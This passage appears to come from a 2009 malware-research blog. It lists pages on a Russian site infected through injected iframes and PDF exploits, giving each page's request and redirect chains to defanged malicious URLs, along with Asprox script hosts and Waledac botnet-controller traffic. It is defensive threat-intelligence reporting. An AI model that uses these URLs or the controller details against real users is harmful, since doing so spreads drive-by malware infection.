Hat SEO, exploits, hacks, botnets</span><br /><br /> Crimeware toolkits in the wild<br /></p><table width="488" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="488"><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS page</a> if you need more information<br /></td></tr></table><p><b>WARNING</b>: All sites listed on this page are dangerous (live URL with exploits) <br /> which lead to trojans beeing automatically installed on your computer.<br />Do NOT visit them unless you know what you are doing. <br />(only links are safe)<br /><p>Another very good example on the site below which lead to other domain in the network previously cited "Eurohost LLC " shows that this attack seems to be everywhere.<br /><br />IFrames injected, pdf malware + viruses. Attached some screenshots.<br /><br /><hr />Infected page:<br /><br /><table width="400" height="28" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="26" style="padding:10px">hxxp://team-sleep.by.ru/default2.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=604bd9c2390b9bad17a7d36a01a31421&t=1240189015&type=js" target="_blank">Analysis</a><br /></p><table width="400" height="28" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="26" style="padding:10px">hxxp://8addition.info/t/?75724cae9d <br />hxxp://sexbases.cn/in.cgi?16&161b72<br />hxxp://utevox.site90.com/f/index.php</td></tr></table><p><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7EVczvmI/AAAAAAAAAY4/DGUFqQzpfe0/s1600-h/default2.html.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 167px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7EVczvmI/AAAAAAAAAY4/DGUFqQzpfe0/s320/default2.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697404935945826" /></a></p><p>************<br />Infected page: <br /></p><table width="400" height="28" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="26" style="padding:10px">hxxp://team-sleep.by.ru/demo.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=15d95656782ca0e0a1318bba5b3d5db0&t=1240189151&type=js" target="_blank">Analysis</a><br /></p><p> Requests: <br /></p><table width="400" height="28" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="26" style="padding:10px">hxxp://bizoplata.ru/pay.html?<br />hxxp://bizoplata.ru/ballast.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://bizoplata.ru/post.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php <br />hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://famajormusic.ru/jjkj/pdf.php</td></tr></table><p> Redirects: <br /></p><table width="400" height="94" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="92" style="padding:10px">hxxp://tixwagoq.cn/in.cgi?4 <br />hxxp://paylayos.cn/nuc/index.php <br /><br />hxxp://5rublei.com/unique/index.php <br />hxxp://tochtonenado.com/yes/index.php </td></tr></table><p><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sew7EckUtJI/AAAAAAAAAZA/KaCw90pWY3Y/s1600-h/demo.html.jpg"><img style="cursor:pointer; cursor:hand;width: 290px; height: 320px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sew7EckUtJI/AAAAAAAAAZA/KaCw90pWY3Y/s320/demo.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697406846514322" /></a></p><p>************<br />Infected page: </p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/gold.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=c0ca85dbda05d075a7c97ab22a8630db&t=1240189158&type=js" target="_blank">Analysis</a><br /><br />Requests:<br /></p><table width="400" height="94" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="92" style="padding:10px">hxxp://team-sleep.by.ru/gold.html<br /> hxxp://5rublei.com/unique/index.php<br /> hxxp://tochtonenado.com/yes/index.php <br /> hxxp://mixbunch.cn/thread.html<br /> hxxp://mixbunch.cn/golf.html<br /> hxxp://tixwagoq.cn/in.cgi?4<br /> hxxp://paylayos.cn/nuc/index.php<br /> hxxp://mixbunch.cn/bowling.html<br /> hxxp://sunmaiamibich.ru/pupu/in.php<br /> hxxp://famajormusic.ru/jjkj/pdf.php</td></tr></table><p> Redirects: <br /></p><table width="400" height="94" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="92" style="padding:10px">hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php <br /><br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php </td></tr></table><p><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7EusanxI/AAAAAAAAAZI/zrU01fbIIBI/s1600-h/gold.html.jpg"><img style="cursor:pointer; cursor:hand;width: 290px; height: 320px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7EusanxI/AAAAAAAAAZI/zrU01fbIIBI/s320/gold.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697411712294674" /></a><br /></p><p>************<br />Infected page: </p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/googleanalyticsru.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=e453f768a057c80b81f2e547bbbf8242&t=1240189161&type=js" target="_blank">Analysis</a><br /><br /> Requests:<br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/googleanalyticsru.html<br />hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://sunmaiamibich.ru/</td></tr></table><p> Redirects: </p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php </td></tr></table><p><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sew7EpPf9zI/AAAAAAAAAZQ/LBri95fd2Ac/s1600-h/googleanalyticsru.html.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 218px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sew7EpPf9zI/AAAAAAAAAZQ/LBri95fd2Ac/s320/googleanalyticsru.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697410248832818" /></a></p><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/media.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=829cb08a1a36b11a84fc82f50448f8e5&t=1240189172&type=js" target="_blank">Analysis</a><br /><br />Requests:</p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/media.html<br />hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php <br />hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php</td></tr></table><p> Redirects:<br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php <br /><br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php </td></tr></table><p><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sew7E1tkULI/AAAAAAAAAZY/Q9ul0fJm5TQ/s1600-h/media.html.jpg"><img style="cursor:pointer; cursor:hand;width: 314px; height: 320px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sew7E1tkULI/AAAAAAAAAZY/Q9ul0fJm5TQ/s320/media.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697413596172466" /></a><br /></p><p>************<br />Infected page: </p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/menu.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=7ac93ca405a6fc78e1e19062eee91e52&t=1240190210&type=js" target="_blank">Analysis</a><br /><br /> Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/menu.html<br />hxxp://bizoplata.ru/pay.html?<br />hxxp://bizoplata.ru/ballast.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://bizoplata.ru/post.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br />hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php <br />hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://mixbunch.cn/bowling.html</td></tr></table><p> Redirects:<br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://tixwagoq.cn/in.cgi?4 <br />hxxp://paylayos.cn/nuc/index.php <br /><br />hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php </td></tr></table><p><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7ZzeRS7I/AAAAAAAAAZg/cHupDQQvvAA/s1600-h/menu.html.jpg"><img style="cursor:pointer; cursor:hand;width: 239px; height: 320px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7ZzeRS7I/AAAAAAAAAZg/cHupDQQvvAA/s320/menu.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697773772393394" /></a><br /></p><p>************<br />Infected page: </p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/news.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=a370e072f26ab0fc502ef5f090100f2d&t=1240189203&type=js" target="_blank">Analysis</a><br /></p>Requests: <br /><br /><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px"> hxxp://moneypuller.site90.net/images/gallery/index.php<br /> hxxp://error.000webhost.com/not_found.html<br /> hxxp://www.000webhost.com/?id=1<br /> hxxp://www.000webhost.com/<br /> hxxp://mixbunch.cn/thread.html<br /> hxxp://mixbunch.cn/golf.html<br /> hxxp://tixwagoq.cn/in.cgi?4<br /> hxxp://paylayos.cn/nuc/index.php<br /> hxxp://mixbunch.cn/bowling.html<br /> hxxp://sunmaiamibich.ru/pupu/in.php<br /> hxxp://famajormusic.ru/jjkj/pdf.php</td></tr></table><p>Redirects: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://tixwagoq.cn/in.cgi?4 <br />hxxp://paylayos.cn/nuc/index.php </td></tr></table><p><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7ZzSNmzI/AAAAAAAAAZo/GZ5JJt8Rlck/s1600-h/news.html.jpg"><img style="cursor:pointer; cursor:hand;width: 290px; height: 320px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7ZzSNmzI/AAAAAAAAAZo/GZ5JJt8Rlck/s320/news.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697773721819954" /></a></p><p>************<br />Infected page: </p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/photo2.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=b0240b35b771b8d402b49bf3e7827572&t=1240189200&type=js" target="_blank">Analysis</a><br /><br /> Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br />hxxp://bizoplata.ru/pay.html?<br />hxxp://bizoplata.ru/ballast.html<br />hxxp://bizoplata.ru/post.html<br />hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php </td></tr></table><p> Redirects:<br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://tixwagoq.cn/in.cgi?4 <br />hxxp://paylayos.cn/nuc/index.php <br /><br />hxxp://5rublei.com/unique/index.php <br />hxxp://tochtonenado.com/yes/index.php</td></tr></table><p><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7aAA8vSI/AAAAAAAAAZw/qH8G6pZTEtY/s1600-h/photo2.html.jpg"><img style="cursor:pointer; cursor:hand;width: 244px; height: 320px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7aAA8vSI/AAAAAAAAAZw/qH8G6pZTEtY/s320/photo2.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697777139072290" /></a><br /></p><p>************<br />Infected page: </p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px"> hxxp://team-sleep.by.ru/poem.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=195a5226ceb60d0db3a38b2a8da4e763&t=1240189221&type=js" target="_blank">Analysis</a><br /><br /> Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br />hxxp://bizoplata.ru/pay.html?<br />hxxp://bizoplata.ru/ballast.html<br />hxxp://bizoplata.ru/post.html</td></tr></table><p> Redirects:<br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://tixwagoq.cn/in.cgi?4 <br />hxxp://paylayos.cn/nuc/index.php </td></tr></table><p><a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sew7aKHSibI/AAAAAAAAAZ4/tbLknXqRpfk/s1600-h/peom.html.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 286px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sew7aKHSibI/AAAAAAAAAZ4/tbLknXqRpfk/s320/peom.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697779850021298" /></a></p><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/press_reviews.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=13731fd005d76fdaf4594868bf38fd66&t=1240189277&type=js" target="_blank">Analysis</a><br /><br /> Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br />hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php </td></tr></table><p> Redirects: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://tixwagoq.cn/in.cgi?4 <br />hxxp://paylayos.cn/nuc/index.php <br /><br />hxxp://5rublei.com/unique/index.php <br />hxxp://tochtonenado.com/yes/index.php </td></tr></table><p><a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sew7afXhRaI/AAAAAAAAAaA/6vezlc7icsk/s1600-h/press_review.html.jpg"><img style="cursor:pointer; cursor:hand;width: 318px; height: 320px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sew7afXhRaI/AAAAAAAAAaA/6vezlc7icsk/s320/press_review.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697785555240354" /></a><br /></p><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/team-sleep.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=279207d4fff5b20adcd1fb624b3740ab&t=1240189275&type=js" target="_blank">Anaysis</a><br /><br /> Redirects:<br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br />hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php </td></tr></table><p>Redirects:<br /></p><table width="400" height="94" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="92" style="padding:10px">hxxp://tixwagoq.cn/in.cgi?4 <br />hxxp://paylayos.cn/nuc/index.php <br /><br />hxxp://5rublei.com/unique/index.php <br />hxxp://tochtonenado.com/yes/index.php <br /></td></tr></table><p><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7nlBq_FI/AAAAAAAAAaY/KrDYgKhjdnU/s1600-h/team-sleep.html.jpg"><img style="cursor:pointer; cursor:hand;width: 313px; height: 320px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7nlBq_FI/AAAAAAAAAaY/KrDYgKhjdnU/s320/team-sleep.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326698010412514386" /></a><br /></p><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/gmail.php<br /></td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=9fc1f920da916d7b64e66c3eec43d1cf&t=1240189268&type=js" target="_blank">Analysis</a><br /><br />Requests:<br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://counnter.cn/top100_00.js <br />hxxp://counnter.cn/z/count.php?o=1 <br />hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php <br /></td></tr></table><p> Redirects: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://5rublei.com/unique/index.php <br />hxxp://tochtonenado.com/yes/index.php <br /></td></tr></table><p><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sew7nW9iHZI/AAAAAAAAAaQ/eIyVgSgHQzA/s1600-h/gmail.php.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 260px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sew7nW9iHZI/AAAAAAAAAaQ/eIyVgSgHQzA/s320/gmail.php.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326698006637059474" /></a><br /></p><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/haitou.php<br /></td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=29b0af53df0979e7246d9e89e09352cc&t=1240189409&type=js" target="_blank">Analysis</a><br /><br />Requests:<br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php <br /></td></tr></table><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/in.php<br /></td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=6f6f7fb6acc398f4a4e0d55b8d675936&t=1240189407&type=js" target="_blank">Analysis</a><br /><br />Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://www.rogercombs.org/index.php<br />hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php <br /></td></tr></table><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/photo/team.html<br /></td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=022ec04155a750ee3f480d2f85791fc7&t=1240189403&type=js" target="_blank">Analysis</a><br /><br />Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://analytics-google.info/s/urchin.js<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br />hxxp://77.221.133.172/.if/go.html?<br />hxxp://by.ru/info/?where <br /></td></tr></table><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/photo/wallz.html<br /></td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=713f99048cdb15abc6d8d4362f64dc89&t=1240189401&type=js" target="_blank">Analysis<br /><br /></a>Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://analytics-google.info/s/urchin.js<br />hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br />hxxp://bizoplata.ru/pay.html?<br />hxxp://bizoplata.ru/ballast.html<br />hxxp://bizoplata.ru/post.html<br />hxxp://by.ru/info/?where<br /></td></tr></table><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/photo/live/index2.html<br /></td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=ecbd15e4abab1929620bc7ce8baa6226&t=1240189400&type=js" target="_blank">Analysis</a><br /><br /> Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://utevox.site90.com/f/index.php<br />hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br /></td></tr></table><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/photo/live/imagepages/image1.html<br /></td></tr></table><br /><br /><a href="http://wepawet.iseclab.org/view.php?hash=cf17de61655dcbbe49b2b156a4657ef8&t=1240189397&type=js" target="_blank">Analysis</a><p>Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://analytics-google.info/s/urchin.js<br />hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br /></td></tr></table><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/photo/members/imagepages/image1.html<br /></td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=af2a41a9e85c52ff2296499b78cacdd7&t=1240189395&type=js" target="_blank">Analysis</a></p><p> Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://analytics-google.info/s/urchin.js<br />hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br /></td></tr></table><p>************<br />Infected page: <br /></p><table width="441" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="437" height="36" style="padding:10px">hxxp://team-sleep.by.ru/photo/team/imagepages/image1.html<br /></td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=3f78714d6c50cff7fb1bd7cd83ab2101&t=1240189392&type=js" target="_blank">Analysis</a></p><p>On this page the domain appears to be previously involved in the Asprox malware campaign. As you can see the fgg.js and script.js are still present on the page.<br /><br />However all of these are not responding.</p><p><a href="http://www.finjan.com/MCRCblog.aspx?EntryId=2002" target="_blank">Finjan report</a><br /><a href="http://www.google.com/search?q=%22fgg.js%22&hl=en&rlz=1G1GGLQ_ENBE320&start=10&sa=N" target="_blank">Google Searchfor fgg.js</a><br /><a href="hxxp://www.google.com/search?source=ig&hl=en&rlz=1G1GGLQ_ENBE320&q=www.netcfg9.ru&btnG=Google+Search&aq=f&oq=" target="_blank">Google Search for www.netcfg9.ru</a><br /></p><p> hxxp://www.jve4.ru/fgg.js <br /> hxxp://www.nmr43.ru/fgg.js <br /> hxxp://www.mj5f.ru/script.js <br /> hxxp://www.vswc.ru/script.js<br /> hxxp://www.pkseio.ru/script.js <br /> hxxp://www.4log-in.ru/script.js <br /> hxxp://www.netcfg9.ru/script.js <br /> hxxp://www.sitevgb.ru/script.js<br /> hxxp://www.errghr.ru/script.js <br /> hxxp://www.81dns.ru/script.js <br /> hxxp://mixbunch.cn/thread.html <br /> hxxp://mixbunch.cn/golf.html<br /> hxxp://tixwagoq.cn/in.cgi?4 <br /> hxxp://paylayos.cn/nuc/index.php<br /> hxxp://mixbunch.cn/bowling.html <br /> hxxp://sunmaiamibich.ru/pupu/in.php<br /> hxxp://famajormusic.ru/jjkj/pdf.php<br /><br /><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7nSxT4TI/AAAAAAAAAaI/9Jy-sUy9QRk/s1600-h/image1.html-Asprox.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 300px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7nSxT4TI/AAAAAAAAAaI/9Jy-sUy9QRk/s320/image1.html-Asprox.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326698005512053042" /></a><br /></p><p>************<br />Infected page: </p><p>hxxp://tochtonenado.com/yes/index.php<br /> hxxp://tochtonenado.com/yes/load.php?stat=Windows</p><p><a href="hxxp://wepawet.cs.ucsb.edu/view.php?type=js&hash=bc2e9aa85b7f80634e5b7e5df0e76324&t=1238341867" target="_blank">Analysis</a><br /><br />Trojan Waledac.GEN</p><p><a href="http://anubis.iseclab.org/?action=result&task_id=19f0382ef717247d4913db3864368582c" target="_blank">Anubis Report</a></p><p>Botnet Controller</p><p> 89.149.244.140:80 - [djbobroff.ru] <br /> Request: GET /spm/index.php?id=584E5E43 <br /> Response: 200 "OK" <br /> Request: GET /spm/index.php?id=584E5E43&download=0000138F <br /> Response: 200 "OK" <br /> Request: POST /spm/index.php?id=584E5E43&mid=5007 <br /> Response: 200 "OK" <br /><br /> C:\WINDOWS\system32\DRIVERS\asyncmac.sys<br /></p><p>*****************</p><p> Exploits:<br /></p><table width="430" border="0" cellspacing="0" cellpadding="0"><tr><td width="269">hxxp://5rublei.com/unique/index.php</td><td width="161"><a href="http://wepawet.iseclab.org/view.php?hash=1caa44fb445de12a00abd26402ae5d28&t=1240188306&type=js" target="_blank">Analysis</a> - <a href="http://www.virustotal.com/analisis/eee1d92f291ebf12eb9a648d5bff3e1c" target="_blank">VirusTotal</a> - <a 